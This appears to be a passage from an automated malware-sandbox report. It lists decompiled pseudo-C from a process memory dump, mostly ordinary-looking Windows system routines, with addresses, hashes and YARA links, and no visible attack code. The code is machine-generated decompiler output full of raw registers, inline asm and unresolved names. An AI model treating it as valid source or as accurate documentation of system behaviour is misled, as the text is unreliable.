				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x451d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E044A6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E044A6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04447D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04469AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0446B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04444620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















            0x044a7016
            0x044a701e
            0x044a702b
            0x044a7033
            0x044a7037
            0x044a703c
            0x044a703e
            0x044a7041
            0x044a7045
            0x044a704a
            0x044a7050
            0x044a7055
            0x044a705a
            0x044a7062
            0x044a7062
            0x044a705a
            0x044a7064
            0x044a7064
            0x044a7067
            0x044a7071
            0x044a7096
            0x044a709b
            0x044a70a2
            0x044a70a6
            0x044a70a7
            0x044a70ad
            0x044a70b3
            0x044a70b6
            0x044a70bb
            0x044a70c3
            0x044a70c3
            0x044a70c6
            0x044a70cd
            0x044a70dd
            0x044a70e0
            0x044a70e2
            0x044a70e2
            0x044a70ee
            0x044a7101
            0x044a70f0
            0x044a70f9
            0x044a70f9
            0x044a710a
            0x044a710e
            0x044a7112
            0x044a7117
            0x044a7118
            0x044a7118
            0x044a70bb
            0x044a711d
            0x044a7123
            0x044a7131
            0x044a7131
            0x044a7136
            0x044a713d
            0x044a713e
            0x044a713f
            0x044a714a
            0x044a714a
            0x044a7084
            0x044a7088
            0x00000000
            0x044a708e
            0x044a708e
            0x044a7092
            0x00000000
            0x044a7092

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7deeb427d2d0b1cd7bba1f9570e0115a3bb737c96c48d97a9efcc64106827565
            • Instruction ID: a259295226912a43a4e646dda1b0f738a5820667a34dcda1deae942d3d365259
            • Opcode Fuzzy Hash: 7deeb427d2d0b1cd7bba1f9570e0115a3bb737c96c48d97a9efcc64106827565
            • Instruction Fuzzy Hash: 8731C2726087919BD720DF68C840A6BB3E5BFD8700F044A2EF89587791E730F914C7A6
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0444C182, Relevance: .1, Instructions: 104COMMON
            Download Yara Rule
            C-Code - Quality: 68%
            			E0444C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04447D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E044F8D34(_v8, _t80);
					}
					E04442280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0443FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E044F8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0443FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0446B180();
						if(_a4 != 0) {
							E04442280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0444BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0444BB2D(_t16, _t15);
						E0444B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0443FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0443FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0443FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















            0x0444c18d
            0x0444c18f
            0x0444c191
            0x0444c19b
            0x0444c1a0
            0x0444c1d4
            0x0444c1de
            0x04492d6e
            0x0444c1e4
            0x0444c1e4
            0x0444c1e4
            0x0444c1ec
            0x04492d7d
            0x04492d7d
            0x0444c1f3
            0x0444c1ff
            0x04492d88
            0x04492d8d
            0x04492d94
            0x04492d94
            0x04492d9f
            0x04492da4
            0x04492dab
            0x04492db0
            0x04492db2
            0x04492db3
            0x04492db4
            0x04492dbc
            0x04492dc3
            0x04492dc3
            0x0444c205
            0x0444c205
            0x0444c208
            0x0444c20e
            0x0444c211
            0x0444c216
            0x0444c219
            0x0444c21f
            0x0444c222
            0x0444c22c
            0x0444c234
            0x0444c23a
            0x0444c23f
            0x0444c245
            0x0444c24b
            0x0444c251
            0x0444c25a
            0x0444c276
            0x0444c27d
            0x0444c27d
            0x0444c25c
            0x0444c25c
            0x00000000
            0x0444c25e
            0x0444c1a4
            0x0444c1aa
            0x0444c1b3
            0x0444c265
            0x0444c26c
            0x0444c26c
            0x00000000

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
            • Instruction ID: 3a992ddb0dd1422d2535be8251309f7ab0f7158cd4e9cb4d370e9e0baf75540c
            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
            • Instruction Fuzzy Hash: CC31C271A06586AAFF04EBB5C480BEAF754BF86208F08415FD51847242DB747A4ADBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04468EC7, Relevance: .1, Instructions: 92COMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E04468EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x451d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04454E70(0x45186e4, 0x4469490, 0, 0);
					if( *0x45153e8 > 5 && E04468F33(0x45153e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x45153e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x45153e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x440bc46;
						_t48 = E044A7B9C(0x45153e8, 0x440bc46, _t67, 0x45153e8, _t70,  &_v140);
					}
				}
				return E0446B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































            0x04468ec7
            0x04468ed9
            0x04468edc
            0x04468ee6
            0x04468ee9
            0x04468eee
            0x04468efc
            0x04468f08
            0x044a1349
            0x044a1353
            0x044a135d
            0x044a1366
            0x044a136f
            0x044a1375
            0x044a137c
            0x044a1385
            0x044a1390
            0x044a1391
            0x044a139c
            0x044a139d
            0x044a13a6
            0x044a13ac
            0x044a13b2
            0x044a13b5
            0x044a13bc
            0x044a13bf
            0x044a13c2
            0x044a13c5
            0x044a13c8
            0x044a13cb
            0x044a13ce
            0x044a13d1
            0x044a13d4
            0x044a13d7
            0x044a13da
            0x044a13dd
            0x044a13e0
            0x044a13e3
            0x044a13e6
            0x044a13e9
            0x044a13f6
            0x044a1400
            0x044a1400
            0x04468f08
            0x04468f32

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e5f2339a1ebd07e90fb50a8ae6349efd50938d1b7d6e8a49511a263467815279
            • Instruction ID: 415532ee3f4a3eb29d07dfcd33816a1c7870c9ab395e5a471c5e2954f41b3f5f
            • Opcode Fuzzy Hash: e5f2339a1ebd07e90fb50a8ae6349efd50938d1b7d6e8a49511a263467815279
            • Instruction Fuzzy Hash: A94192B1D002189FEB24DFAAD981AADFBF4FB48314F5041AFE509A7241E7746A84CF51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445E730, Relevance: .1, Instructions: 89COMMON
            Download Yara Rule
            C-Code - Quality: 74%
            			E0445E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04469670() < 0) {
					L0447DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4517b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04444620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0445E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















            0x0445e730
            0x0445e736
            0x0445e738
            0x0445e73d
            0x0445e73e
            0x0445e740
            0x0445e749
            0x0445e765
            0x0445e76a
            0x0445e76b
            0x0445e76c
            0x0445e76d
            0x0445e76e
            0x0445e76f
            0x0445e775
            0x0445e777
            0x0445e77e
            0x0449b675
            0x0445e784
            0x0445e784
            0x0445e789
            0x0445e7a8
            0x0445e7ac
            0x0445e807
            0x0445e7ae
            0x0445e7ae
            0x0445e7b1
            0x0445e7b4
            0x0445e7b9
            0x0445e7c0
            0x0445e7c4
            0x0445e7ca
            0x0445e7cc
            0x00000000
            0x0445e7d3
            0x0445e7d6
            0x00000000
            0x00000000
            0x0445e7ff
            0x0445e802
            0x00000000
            0x00000000
            0x0445e7f9
            0x0445e7fc
            0x00000000
            0x00000000
            0x0445e7f3
            0x0445e7f6
            0x00000000
            0x00000000
            0x0445e7ed
            0x0445e7f0
            0x00000000
            0x00000000
            0x0445e7e7
            0x0445e7ea
            0x00000000
            0x00000000
            0x0449b685
            0x0449b688
            0x00000000
            0x00000000
            0x0449b682
            0x00000000
            0x00000000
            0x0445e7cc
            0x0445e7d9
            0x0445e7dc
            0x0445e7de
            0x0445e7de
            0x0445e7ac
            0x0445e7e4
            0x0445e74b
            0x0445e751
            0x0445e759
            0x0445e761
            0x0445e761

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3be6ba6a360a6cfb33cdddf7a2ff42bce428ede60c5f6a3f7b3f274a5fbea737
            • Instruction ID: ee78e1d09777df22c4da9de7b275349337dd963c94d055a0ad941d37d4dd61b3
            • Opcode Fuzzy Hash: 3be6ba6a360a6cfb33cdddf7a2ff42bce428ede60c5f6a3f7b3f274a5fbea737
            • Instruction Fuzzy Hash: EC318E75A14249EFEB44CF28D840B96BBE4FB08314F14825AF904CB352E631ED80CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445BC2C, Relevance: .1, Instructions: 88COMMON
            Download Yara Rule
            C-Code - Quality: 67%
            			E0445BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4516100; // 0x35
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04442280(0xd, 0x1596f1a0);
				_t41 =  *0x45160f8; // 0x0
				if(_t41 != 0) {
					 *0x45160f8 =  *_t41;
					 *0x45160fc =  *0x45160fc + 0xffff;
				}
				E0443FFB0(_t41, 0x800, 0x1596f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x45160f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04444620(0x4516100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4516100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










            0x0445bc36
            0x0445bc42
            0x0445bc45
            0x0445bc4a
            0x0445bd35
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0445bc50
            0x0445bc50
            0x0445bc58
            0x0445bc5a
            0x0445bc60
            0x00000000
            0x00000000
            0x0449a4f2
            0x0449a4f6
            0x00000000
            0x00000000
            0x00000000
            0x0449a4fc
            0x0445bc79
            0x0445bc7e
            0x0445bc86
            0x0445bd16
            0x0445bd20
            0x0445bd20
            0x0445bc8d
            0x0445bc94
            0x0445bcbd
            0x0445bcca
            0x0445bccb
            0x0445bccc
            0x0445bccd
            0x0445bcce
            0x0445bcd4
            0x0445bcea
            0x0445bcee
            0x0445bcf2
            0x0445bd00
            0x0445bd04
            0x00000000
            0x0445bc96
            0x0445bcab
            0x0445bcaf
            0x0445bd2c
            0x0445bd2c
            0x0445bd09
            0x00000000
            0x0445bd09
            0x0445bcb1
            0x0445bcb5
            0x0445bcbb
            0x00000000
            0x00000000
            0x00000000
            0x0445bcbb

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5ce4a34cd5d388a8c6617f8e7d8d65dc7115bd4c42489f57cdea7b225de2794a
            • Instruction ID: 2fd11822969bc826d2aea6dce81a1e3627066bc8a2aa3de69ca6552f94a4fc4b
            • Opcode Fuzzy Hash: 5ce4a34cd5d388a8c6617f8e7d8d65dc7115bd4c42489f57cdea7b225de2794a
            • Instruction Fuzzy Hash: 1B31DF32A006969BEF11DF58D4807A673B4FB18315F0544BAED44DB322E678FE09DB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04429100, Relevance: .1, Instructions: 87COMMON
            Download Yara Rule
            C-Code - Quality: 76%
            			E04429100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x44ff6e8);
				E0447D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E044F88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0447D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x45186c0; // 0x1707b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x45186b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04442280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E044F88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0446AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x451b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x45184c0;
										if(_t69 >=  *0x45184c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E044F9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0442922A(_t82);
							_t53 = E04447D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E044F8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x45186c0; // 0x1707b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x45186b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x45186bc;
										_t72 = 0x45186b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04429240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x45186c4;
									_t72 = 0x45186c0;
									L18:
									E04459B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















            0x04429100
            0x04429100
            0x04429100
            0x04429100
            0x04429102
            0x04429107
            0x0442910c
            0x04429110
            0x04429115
            0x04429136
            0x04429143
            0x044837e4
            0x044837e4
            0x04429149
            0x0442914e
            0x0442914e
            0x04429117
            0x0442911d
            0x00000000
            0x00000000
            0x0442911f
            0x04429125
            0x00000000
            0x04429151
            0x04429158
            0x0442915d
            0x04429161
            0x04429168
            0x04483715
            0x00000000
            0x0442916e
            0x0442916e
            0x04429175
            0x04429177
            0x0442917e
            0x0442917f
            0x04429182
            0x04429182
            0x04429187
            0x04429187
            0x0442918a
            0x0442918d
            0x0442918f
            0x04429192
            0x04429195
            0x04429198
            0x04429198
            0x04429198
            0x0442919a
            0x00000000
            0x00000000
            0x0448371f
            0x04483721
            0x04483727
            0x0448372f
            0x04483733
            0x04483735
            0x04483738
            0x0448373b
            0x0448373d
            0x04483740
            0x00000000
            0x00000000
            0x04483746
            0x04483749
            0x00000000
            0x00000000
            0x0448374f
            0x04483751
            0x00000000
            0x00000000
            0x04483757
            0x04483759
            0x0448375c
            0x0448375c
            0x0448375e
            0x0448375e
            0x04483761
            0x04483764
            0x00000000
            0x00000000
            0x04483766
            0x04483768
            0x044837a3
            0x044837a3
            0x044837a5
            0x044837a7
            0x044837ad
            0x044837b0
            0x044837b2
            0x044837bc
            0x044837c2
            0x044837c2
            0x044837b2
            0x04429187
            0x04429187
            0x0442918a
            0x0442918d
            0x0442918f
            0x04429192
            0x04429195
            0x00000000
            0x04429195
            0x00000000
            0x04429187
            0x0448376a
            0x0448376a
            0x0448376c
            0x0448376c
            0x0448376f
            0x04483775
            0x00000000
            0x00000000
            0x04483777
            0x04483779
            0x00000000
            0x00000000
            0x04483782
            0x04483787
            0x04483789
            0x04483790
            0x04483790
            0x0448378b
            0x0448378b
            0x0448378b
            0x04483792
            0x04483795
            0x04483795
            0x04483798
            0x04483798
            0x0448379b
            0x0448379b
            0x044291a3
            0x044291a9
            0x044291b0
            0x044291b4
            0x044291b4
            0x044291bb
            0x044291c0
            0x044291c5
            0x044291c7
            0x044837da
            0x044291cd
            0x044291cd
            0x044291cd
            0x044291d2
            0x044291d5
            0x04429239
            0x04429239
            0x044291d7
            0x044291db
            0x044291e1
            0x044291e7
            0x044291fd
            0x04429203
            0x0442921e
            0x04429223
            0x00000000
            0x04429223
            0x04429205
            0x04429208
            0x0442920c
            0x04429214
            0x04429214
            0x044291e9
            0x044291e9
            0x044291ee
            0x044291f3
            0x044291f3
            0x044291f3
            0x044291e7
            0x00000000
            0x044291db
            0x04429187
            0x04429168

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: eb85aba47f4fbbf0eca94ff18bcb6e0162f4ccf3f1b0fb032e50e8ecc805565a
